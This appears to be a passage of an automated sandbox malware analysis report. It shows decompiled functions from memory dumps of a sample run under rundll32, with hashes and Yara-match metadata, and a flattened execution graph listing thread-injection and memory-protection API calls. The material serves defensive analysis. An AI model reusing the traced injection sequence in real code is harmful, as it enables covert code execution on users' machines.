                				E000002152152058F380( *((intOrPtr*)(__rcx + 0x28)), __rdx);
                				_t61 = _t47;
                				_v80 = _t47;
                				_v72 = _t47;
                				if ( *((intOrPtr*)(_t61 + 8)) + 0xda812030 - 1 <= 0) goto 0x20593e7d;
                				 *((intOrPtr*)( *_t61 + 0x30))();
                				goto 0x20593e82;
                				_v64 = 0xda812030;
                				_v80 = _t34;
                				_v72 = _t61;
                				if (((0 | _t34 != 0x00000000) & 1) == 0) goto 0x20593ec7;
                				if (0x4d54ee85da812032 != 1) goto 0x20593ea5;
                				if (_t34 == 0) goto 0x20593ec7;
                				E0000021521520590B90(_t35, __rbx,  &_v56,  &_v80, "pqcs");
                				return E000002152152059DF30(_t34, _t50,  &_v56, _t62, "pqcs");
                			}













                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CompletionErrorLastPostQueuedStatus
                • String ID: pqcs
                • API String ID: 1506555858-2559862021
                • Opcode ID: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction ID: c75f562e91bbd0f468f792f5b6138d724c06ca11ed6e6bab74752be2639e4d7e
                • Opcode Fuzzy Hash: c5c792db30b7c14ccf9868605fe78f4305e3ec2e17efe680536f6939b843083c
                • Instruction Fuzzy Hash: 4021C233712E50CAEFA08B15A5C479E63A4FBE4794F244225DE99836A8DF34C4558B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E0000021521520591000(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
                				void* _v8;
                				char _v56;
                				long long _v64;
                				long long _v72;
                				char _v80;
                				long _t21;
                				void* _t31;
                				void* _t32;
                				long long _t42;
                				long long _t56;
                				long long _t58;
                
                				_t45 = __rbx;
                				_t42 = _t58;
                				 *((long long*)(_t42 - 0x58)) = 0xfffffffe;
                				 *((long long*)(_t42 + 8)) = __rbx;
                				 *((long long*)(_t42 + 0x10)) = __rsi;
                				_t21 = TlsAlloc();
                				if (_t21 != 0xffffffff) goto 0x205910b4;
                				_t31 = GetLastError();
                				E000002152152058F380(__rcx, __rdx);
                				_t56 = _t42;
                				_v80 = _t42;
                				_v72 = _t42;
                				if ( *((intOrPtr*)(_t56 + 8)) + 0xda812030 - 1 <= 0) goto 0x2059106a;
                				 *((intOrPtr*)( *_t56 + 0x30))();
                				goto 0x2059106f;
                				_v64 = 0xda812030;
                				_v80 = _t31;
                				_v72 = _t56;
                				if (((0 | _t31 != 0x00000000) & 1) == 0) goto 0x205910b4;
                				if (0x4d54ee85da812032 != 1) goto 0x20591092;
                				if (_t31 == 0) goto 0x205910b4;
                				E0000021521520590B90(_t32, __rbx,  &_v56,  &_v80, "tss");
                				E000002152152059DF30(_t31, _t45,  &_v56, _t56, "tss");
                				return _t21;
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AllocErrorLast
                • String ID: tss
                • API String ID: 4252645092-1638339373
                • Opcode ID: e82f6ce6112f27b1e9590116a3777b187b98120dad7ae3bf605ab3515013e93c
                • Instruction ID: ba69e3359d2a196ff0a17540208e9de410480e2e7bd4dbe93d94f2e6d364e34f
                • Opcode Fuzzy Hash: e82f6ce6112f27b1e9590116a3777b187b98120dad7ae3bf605ab3515013e93c
                • Instruction Fuzzy Hash: 79119633712FA4C7DF509B15A48829D63A4FBD57A0F144361EEAE83798DF35C9858740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E0000021521520611544(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r9, char _a8, long long _a16, long long _a24) {
                				void* __rdi;
                				void* _t31;
                				intOrPtr* _t33;
                				void* _t43;
                				void* _t46;
                
                				_t44 = __rsi;
                				_a16 = __rbx;
                				_a24 = __rsi;
                				_t43 = __rdx;
                				_t33 = __rcx;
                				if (__rcx == 0) goto 0x206115b6;
                				if ( *__rcx == 0) goto 0x206115b6;
                				if (E0000021521520616FFC( *__rcx, __rcx, 0x20635b30) == 0) goto 0x206115b6;
                				if (E0000021521520616FFC(E0000021521520616FFC( *__rcx, __rcx, 0x20635b30), __rcx, 0x20635b38) != 0) goto 0x206115ac;
                				_t3 = _t43 + 0x258; // 0x2f0
                				_t4 = _t44 + 2; // 0x2
                				r9d = _t4;
                				if (E000002152152060CB80(0x2000000b, E0000021521520616FFC(E0000021521520616FFC( *__rcx, __rcx, 0x20635b30), __rcx, 0x20635b38), __rcx, _t3, __rdx, __rsi, _t46,  &_a8) == 0) goto 0x206115d6;
                				goto 0x206115e8;
                				E000002152152060BE10(0x2000000b, _t31, _t33, _t33, _t44, _t46);
                				goto 0x206115e8;
                				_t7 = _t43 + 0x258; // 0x2f0
                				r9d = 2;
                				if (E000002152152060CB80(0x20001004, E000002152152060CB80(0x2000000b, E0000021521520616FFC(E0000021521520616FFC( *__rcx, __rcx, 0x20635b30), __rcx, 0x20635b38), __rcx, _t3, __rdx, __rsi, _t46,  &_a8), _t33, _t7, _t43, _t44, _t46,  &_a8) != 0) goto 0x206115da;
                				goto 0x206115e8;
                				if (_a8 != 0) goto 0x206115e8;
                				return GetACP();
                			}









                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ACP$OCP
                • API String ID: 0-711371036
                • Opcode ID: 2512a34332cc7647f62436d0d6291ed1004cc08f52c024078e6aef40a8a1c94b
                • Instruction ID: 904b942827f46d236c8dcf61ae20da633527aa10e60a51c80b3322378575e524
                • Opcode Fuzzy Hash: 2512a34332cc7647f62436d0d6291ed1004cc08f52c024078e6aef40a8a1c94b
                • Instruction Fuzzy Hash: 4F118173212E61D2FF74D762A4087DAE362AFE4780FA444A1AE069778DEB34E945C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 51%
                			E00007FFA7FFA535ED26C(signed int __ecx, void* __r9, signed long long _a16, long long _a32, long long _a40, intOrPtr _a64) {
                				signed int _t17;
                				signed char _t18;
                				void* _t19;
                				signed int _t20;
                				signed int _t26;
                				signed long long _t36;
                
                				_t20 = __ecx;
                				asm("movsd [esp+0x8], xmm0");
                				asm("movsd [esp+0x68], xmm0");
                				_t36 = _a16;
                				if ((_t36 & 0x00000000) != 0) goto 0x535ed30c;
                				if ((0xffffffff & _t36) == 0) goto 0x535ed2b1;
                				goto 0x535f0da0;
                				if ((0x00000000 & _t36) == 0) goto 0x535ed30c;
                				asm("movsd xmm1, [esp+0x60]");
                				r9d = 1;
                				asm("xorps xmm0, xmm0");
                				_a64 = r9d;
                				asm("movsd [esp+0x38], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				_a40 = 0x21;
                				_a32 = 8;
                				_t17 = E00007FFA7FFA535F0B44(_t19, __r9 + 4, 0x00000000 & _t36, 0x53671efc, _t36, 0);
                				goto 0x535ed33a;
                				_t26 = 0xffffffff & _t36;
                				asm("dec eax");
                				_t18 = _t17 & 0xffffff00 | _t26 > 0x00000000;
                				if ((_t18 & (_t20 & 0xffffff00 | _t26 != 0x00000000)) != 0) goto 0x535ed2c0;
                				asm("sqrtsd xmm2, [esp+0x60]");
                				asm("movsd [esp+0x70], xmm2");
                				asm("movsd xmm0, [esp+0x70]");
                				return _t18;
                			}










                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$sqrt
                • API String ID: 1757819995-799759792
                • Opcode ID: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction ID: 4a54b17e134f0adf238fc96ea45de3cbe74dd13ad5ec81118c7a93bf6dbe069b
                • Opcode Fuzzy Hash: 729eb5268c35a0980c09cb185ac8c72b798560779506d5a1e1b96fb7e0acc6fb
                • Instruction Fuzzy Hash: E111B472928F8586DE41CF11A50032A66A6EFDB7E4F24D335EA6C16BC8DF2CE0419B00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00007FFA7FFA535F20EB(void* __eax, void* __ecx, void* __rax) {
                
                				asm("rcr dword [ebp+0x816ee0d], 1");
                				 *((intOrPtr*)(__rax - 0x7d)) =  *((intOrPtr*)(__rax - 0x7d)) + __ecx;
                				asm("loopne 0x5");
                				return __eax;
                			}



                0x7ffa535f20eb
                0x7ffa535f20f1
                0x7ffa535f20f4
                0x7ffa535f20f6

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_error
                • String ID: !$cos
                • API String ID: 1757819995-1949035351
                • Opcode ID: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction ID: 6ccaaf37afb0d8076bee4401a86273a5ef969ac342ab9ffefb74f8d11d3310ef
                • Opcode Fuzzy Hash: b51537b2761bdc66e35e25f8c78d2b381d488c5843d727cbe6cb5f4fbf7b3257
                • Instruction Fuzzy Hash: 9401E1BAA28FC546DA04CF22980036E6162FBDA784F949334EA5D17BC8EB2CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00007FFA7FFA535F20F8(long long _a8) {
                				intOrPtr _v24;
                				long long _v48;
                				long long _v56;
                				void* _t9;
                				void* _t10;
                				signed long long _t15;
                
                				r8d = 0x12;
                				goto 0x535f2120;
                				asm("int3");
                				asm("int3");
                				r8d = 0x1e;
                				goto 0x535f2120;
                				asm("int3");
                				asm("int3");
                				asm("movsd [esp+0x60], xmm0");
                				_t15 = _a8;
                				r10d = r8d;
                				asm("movaps xmm1, xmm0");
                				if ((_t15 & 0x00000000) != 0) goto 0x535f21b7;
                				if ((0xffffffff & _t15) != 0) goto 0x535f21a5;
                				r9d = 1;
                				_v24 = r9d;
                				asm("xorps xmm0, xmm0");
                				asm("movsd [esp+0x38], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				_v48 = 0x21;
                				_v56 = 8;
                				_a8 = 0;
                				_t9 = E00007FFA7FFA535F0B44(_t10, r10d, 0xffffffff & _t15, 0x53671f04, 0, 0);
                				goto 0x535f21b7;
                				_a8 = 0xfff8000000000000;
                				asm("movsd xmm0, [esp+0x60]");
                				return _t9;
                			}










                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$cos
                • API String ID: 3384550415-1949035351
                • Opcode ID: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction ID: b98486cbb7c7ad8c95903bcf641d360f1fde733240f316f09a453ba1c0808dd3
                • Opcode Fuzzy Hash: edee88c7394a9a8d8abb3cd62ee3fdd2bcd9f50bfb018f013d89ef7671a95121
                • Instruction Fuzzy Hash: C501D2B6A28FC446DA10CF22A80037A6162FBDA7C4F509334EA4D17B88EF3CE151CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 56%
                			E00007FFA7FFA535F210C(long long _a8) {
                				intOrPtr _v24;
                				long long _v48;
                				long long _v56;
                				void* _t9;
                				void* _t10;
                				signed long long _t15;
                
                				r8d = 0x1e;
                				goto 0x535f2120;
                				asm("int3");
                				asm("int3");
                				asm("movsd [esp+0x60], xmm0");
                				_t15 = _a8;
                				r10d = r8d;
                				asm("movaps xmm1, xmm0");
                				if ((_t15 & 0x00000000) != 0) goto 0x535f21b7;
                				if ((0xffffffff & _t15) != 0) goto 0x535f21a5;
                				r9d = 1;
                				_v24 = r9d;
                				asm("xorps xmm0, xmm0");
                				asm("movsd [esp+0x38], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				_v48 = 0x21;
                				_v56 = 8;
                				_a8 = 0;
                				_t9 = E00007FFA7FFA535F0B44(_t10, r10d, 0xffffffff & _t15, 0x53671f04, 0, 0);
                				goto 0x535f21b7;
                				_a8 = 0xfff8000000000000;
                				asm("movsd xmm0, [esp+0x60]");
                				return _t9;
                			}










                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_handle_error_raise_exc
                • String ID: !$sin
                • API String ID: 3384550415-1565623160
                • Opcode ID: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction ID: 9f0fe626548f1c3974b523ed01bc2dc534fb9964156baa372bca17854b060a4e
                • Opcode Fuzzy Hash: 361b00e162a6c88b8351d59fb4018f7250c35803a1d3775a8525240e4db19aae
                • Instruction Fuzzy Hash: 0D01F5B6A28FC445D610CF12980037A6162BFDB7C4F509324EA4D16B88EF7CD141CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E00007FFA7FFA535F3550(void* __eflags, void* __r8, signed long long _a32) {
                				long long _v40;
                				long long _v64;
                				long long _v72;
                				intOrPtr _t10;
                				void* _t11;
                				void* _t12;
                				void* _t13;
                				intOrPtr* _t17;
                				intOrPtr* _t20;
                
                				_t21 = __r8;
                				_t17 = _t20;
                				asm("movaps [eax-0x18], xmm6");
                				asm("movaps xmm6, xmm1");
                				asm("movaps xmm2, xmm0");
                				r8d = r8d - 2;
                				if (__eflags == 0) goto 0x535f3592;
                				if (r8d != 1) goto 0x535f35ea;
                				 *((intOrPtr*)(_t17 - 0x28)) = r8d;
                				_t2 = _t21 + 2; // 0x200000001
                				r9d = _t2;
                				asm("xorps xmm1, xmm1");
                				asm("movss [eax-0x30], xmm1");
                				asm("movss [eax-0x38], xmm2");
                				 *((long long*)(_t17 - 0x40)) = 0x22;
                				 *((long long*)(_t17 - 0x48)) = 0x11;
                				goto 0x535f35bf;
                				_v40 = 1;
                				asm("xorps xmm0, xmm0");
                				asm("movss [esp+0x38], xmm0");
                				r9d = 4;
                				asm("movss [esp+0x30], xmm2");
                				_v64 = 0x22;
                				_v72 = 0x12;
                				_a32 = _a32 & 0x00000000;
                				asm("movss [esp+0x88], xmm6");
                				 *_t17 = _t10;
                				 *_t17 =  *_t17 + _t10;
                				_t11 = E00007FFA7FFA535F0C6C(_t12, _t13,  *_t17, 0x53678540, 0x14, __r8);
                				asm("movaps xmm0, xmm6");
                				asm("movaps xmm6, [esp+0x50]");
                				return _t11;
                			}













                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: "$expf
                • API String ID: 2315412904-303238936
                • Opcode ID: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction ID: 3ca24db9f424951db9495ff09cb59ca0f26dd413ffadfcd395ce1a0a0d2c5c56
                • Opcode Fuzzy Hash: ecdfa100b0e40134a013d6faf908fb403a36dbfd93a5c1f1fd6f413ea569dd35
                • Instruction Fuzzy Hash: FD017372938BC486E331CB21D0893AAB761FBE6344F649315E348266A0CF7DD495DB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 16%
                			E00000215215205914C0(long long __rbx, long long __rcx, intOrPtr* __rdx, long long* __r8, void* __r9) {
                				void* _t28;
                				long long _t48;
                				intOrPtr _t49;
                				intOrPtr* _t55;
                				intOrPtr _t58;
                				intOrPtr _t64;
                				intOrPtr _t74;
                				intOrPtr _t76;
                				long long _t80;
                				void* _t83;
                
                				 *((long long*)(_t83 + 0x20)) = 0xfffffffe;
                				 *((long long*)(_t83 + 0x68)) = __rbx;
                				 *((long long*)(_t83 + 0x70)) = _t80;
                				 *((long long*)(_t83 + 0x28)) = __rcx;
                				EnterCriticalSection(??);
                				 *((char*)(_t83 + 0x30)) = 1;
                				_t74 =  *((intOrPtr*)(__rcx + 0x30));
                				if (_t74 == 0) goto 0x2059154b;
                				_t48 =  *((intOrPtr*)(_t74 + 0x10));
                				if (_t48 == 0) goto 0x2059151c;
                				_t58 =  *((intOrPtr*)(__rdx + 8));
                				if (_t58 == 0) goto 0x2059151c;
                				if (_t48 == _t58) goto 0x205915f0;
                				if ( *((intOrPtr*)(_t74 + 8)) == 0) goto 0x20591542;
                				if ( *__rdx == 0) goto 0x20591542;
                				if (E00000215215205F781C( *((intOrPtr*)(_t74 + 8)) + 8,  *__rdx + 8) == 0) goto 0x205915f0;
                				if ( *((intOrPtr*)(_t74 + 0x20)) != 0) goto 0x20591501;
                				LeaveCriticalSection(??);
                				 *((char*)(_t83 + 0x30)) = 0;
                				 *__r8();
                				_t55 = _t48;
                				 *((long long*)(_t83 + 0x60)) = _t48;
                				asm("movups xmm0, [esi]");
                				asm("movups [eax+0x8], xmm0");
                				EnterCriticalSection(??);
                				 *((char*)(_t83 + 0x30)) = 1;
                				_t76 =  *((intOrPtr*)(__rcx + 0x30));
                				if (_t76 == 0) goto 0x205915c7;
                				_t49 =  *((intOrPtr*)(_t76 + 0x10));
                				if (_t49 == 0) goto 0x2059159c;
                				_t64 =  *((intOrPtr*)(__rdx + 8));
                				if (_t64 == 0) goto 0x2059159c;
                				if (_t49 == _t64) goto 0x205915dd;
                				if ( *((intOrPtr*)(_t76 + 8)) == 0) goto 0x205915be;
                				if ( *__rdx == 0) goto 0x205915be;
                				if (E00000215215205F781C( *((intOrPtr*)(_t76 + 8)) + 8,  *__rdx + 8) == 0) goto 0x205915dd;
                				if ( *((intOrPtr*)(_t76 + 0x20)) != 0) goto 0x20591585;
                				 *((long long*)(_t55 + 0x20)) =  *((intOrPtr*)(__rcx + 0x30));
                				 *((long long*)(__rcx + 0x30)) = _t55;
                				 *((long long*)(_t83 + 0x60)) = _t55;
                				if (_t55 == 0) goto 0x205915f0;
                				_t28 =  *((intOrPtr*)( *_t55))();
                				LeaveCriticalSection(??);
                				return _t28;
                			}














                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID:
                • API String ID: 3168844106-0
                • Opcode ID: 6c6d2242197f0821451c108ba304f23390c731718bc14dbbf7516e377325aafc
                • Instruction ID: e2e06662c7804ac0d254b7c827ac1ffe5a2ef07cbec03f41c8a076a1f783aee5
                • Opcode Fuzzy Hash: 6c6d2242197f0821451c108ba304f23390c731718bc14dbbf7516e377325aafc
                • Instruction Fuzzy Hash: AB419277302FA4C6EE658F16A5887996361FFE4BD0F1A81649E9B07B8CDF38D4408B44
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:2.3%
                Dynamic/Decrypted Code Coverage:0.1%
                Signature Coverage:0%
                Total number of Nodes:835
                Total number of Limit Nodes:23
__scrt_initialize_thread_safe_statics 56130 285c805c22b GetCurrentProcess NtCreateThreadEx 56129->56130 56130->56123 56131 285c805c292 GetThreadContext 56130->56131 56132 285c805c2ac 56131->56132 56133 285c805c2b6 SetThreadContext 56131->56133 56132->56077 56133->56132 56134 285c805c2db ResumeThread 56133->56134 56134->56123 56165 285c80dbcb8 56135->56165 56138 285c80c9b40 16 API calls 56139 285c80c4ec6 56138->56139 56139->56092 56141 285c80c4f9a 56140->56141 56182 285c80c9af8 56141->56182 56143 285c80c4f9f 56144 285c80c4fa3 56143->56144 56188 285c80c9b54 4 API calls 3 library calls 56143->56188 56144->56102 56205 285c80c4fc4 56146->56205 56148 285c80c4e83 56148->56109 56150 285c80f7458 56149->56150 56152 285c80c5dfd __ExceptionPtr::__ExceptionPtr 56151->56152 56153 285c80c5e19 RtlCaptureContext RtlLookupFunctionEntry 56152->56153 56154 285c80c5e42 RtlVirtualUnwind 56153->56154 56155 285c80c5e7e __ExceptionPtr::__ExceptionPtr 56153->56155 56154->56155 56156 285c80c5eb0 IsDebuggerPresent 56155->56156 56157 285c80c5ef3 __scrt_fastfail 56156->56157 56157->56096 56159 285c80c4f3d __scrt_acquire_startup_lock 56158->56159 56160 285c80db70c 12 API calls 56159->56160 56161 285c80c4f51 56159->56161 56162 285c80dbacd 56160->56162 56161->56100 56162->56100 56163->56104 56164->56108 56168 285c80dc2f0 56165->56168 56169 285c80dc301 56168->56169 56170 285c80c4ec1 56168->56170 56178 285c80dc9f4 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue __vcrt_uninitialize_ptd 56169->56178 56170->56138 56172 285c80dc306 56172->56170 56179 285c80dca4c LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue __vcrt_uninitialize_ptd 56172->56179 56174 285c80dc31b 56180 285c80dc190 11 API calls 2 library calls 56174->56180 56176 285c80dc323 56181 285c80da780 11 API calls 2 library calls 56176->56181 56178->56172 56179->56174 56180->56176 56181->56170 56183 285c80c9b01 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 56182->56183 56189 285c80ca554 56183->56189 
56185 285c80c9b0b 56187 285c80c9b0f __vcrt_uninitialize_locks 56185->56187 56193 285c80ca318 6 API calls 3 library calls 56185->56193 56187->56143 56188->56144 56191 285c80ca55c 56189->56191 56192 285c80ca589 __vcrt_uninitialize_locks 56191->56192 56194 285c80ca0ac 56191->56194 56192->56185 56193->56187 56199 285c80c9d80 56194->56199 56196 285c80ca0e7 56197 285c80ca103 InitializeCriticalSectionAndSpinCount 56196->56197 56198 285c80ca0ef 56196->56198 56197->56198 56198->56191 56200 285c80c9de1 try_get_function 56199->56200 56201 285c80c9de6 __scrt_initialize_thread_safe_statics 56199->56201 56200->56201 56202 285c80c9e19 LoadLibraryExW 56200->56202 56201->56196 56202->56200 56203 285c80c9e3f GetLastError 56202->56203 56203->56200 56204 285c80c9e4a LoadLibraryExW 56203->56204 56204->56200 56206 285c80c5082 56205->56206 56209 285c80c4fdc __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 56205->56209 56207 285c80c5dd8 __scrt_fastfail 5 API calls 56206->56207 56208 285c80c508c 56207->56208 56209->56148 56211 285c809a775 56210->56211 56213 285c805c1f1 GetModuleHandleW 56210->56213 56216 285c809b35c 56211->56216 56213->56129 56217 285c809a78b 56216->56217 56218 285c809b39b 56216->56218 56217->56213 56224 285c809a568 56217->56224 56218->56217 56219 285c809b4d0 56218->56219 56220 285c809b48a lstrcmpA 56218->56220 56219->56217 56221 285c809b4ec 56219->56221 56220->56218 56220->56219 56234 285c809b298 9 API calls 2 library calls 56221->56234 56223 285c809b4f7 56223->56217 56227 285c809a594 56224->56227 56226 285c809a61f 56226->56213 56228 285c809a5fa 56227->56228 56235 285c809a884 56227->56235 56228->56226 56243 285c809b0d8 56228->56243 56230 285c809a686 VirtualProtectEx 56230->56226 56231 285c809a6e8 VirtualProtectEx 56230->56231 56231->56226 56234->56223 56238 285c809a8b2 56235->56238 56236 285c809a92e 56240 285c809a954 VirtualQuery 56236->56240 56241 285c809a9aa 56236->56241 56242 285c809a977 VirtualAlloc 56236->56242 56237 285c809a8d1 VirtualQuery 56237->56238 
56238->56236 56238->56237 56239 285c809a8f4 VirtualAlloc 56238->56239 56239->56238 56239->56241 56240->56236 56241->56228 56242->56236 56242->56241 56244 285c809b10a 56243->56244 56247 285c80c59d0 56244->56247 56246 285c809a650 56246->56226 56246->56230 56248 285c80c59da 56247->56248 56249 285c80c60d8 IsProcessorFeaturePresent 56248->56249 56250 285c80c59e6 56248->56250 56251 285c80c60ef 56249->56251 56250->56246 56254 285c80c62cc RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56251->56254 56253 285c80c6102 56253->56246 56254->56253 56255 285c8059e00 56256 285c8059e64 WaitForSingleObject 56255->56256 56257 285c8059e6d 56255->56257 56256->56257 56258 285c8059e91 56257->56258 56411 285c8056c40 56257->56411 56427 285c809cd00 56258->56427 56261 285c8059e96 56262 285c805c0ab collate 56261->56262 56263 285c8059e9e 56261->56263 56506 285c80cae64 11 API calls 56263->56506 56265 285c8059ea5 56507 285c80cab80 23 API calls _Getcoll 56265->56507 56267 285c8059ead 56508 285c80cace4 15 API calls 4 library calls 56267->56508 56269 285c8059ed1 56509 285c8056b10 12 API calls 4 library calls 56269->56509 56272 285c805a0b9 56511 285c8056b10 12 API calls 4 library calls 56272->56511 56274 285c805a0fc 56512 285c8056b10 12 API calls 4 library calls 56274->56512 56276 285c805a146 56513 285c80571e0 70 API calls 2 library calls 56276->56513 56278 285c8059f24 56510 285c8056b10 12 API calls 4 library calls 56278->56510 56279 285c805a34c CoInitializeEx CoInitializeSecurity 56514 285c809a49c GetModuleHandleW __scrt_initialize_thread_safe_statics 56279->56514 56281 285c805a3b2 56515 285c809be80 31 API calls _Mpunct 56281->56515 56283 285c805a3be 56516 285c809bb80 31 API calls _Mpunct 56283->56516 56285 285c805a3c8 56517 285c80595d0 12 API calls collate 56285->56517 56287 285c805a3df 56518 285c8051460 35 API calls 2 library calls 56287->56518 56289 285c805a4de 56519 285c8097480 22 API calls std::_Winerror_message 56289->56519 56291 285c805a4eb 56292 285c805a509 56291->56292 56293 
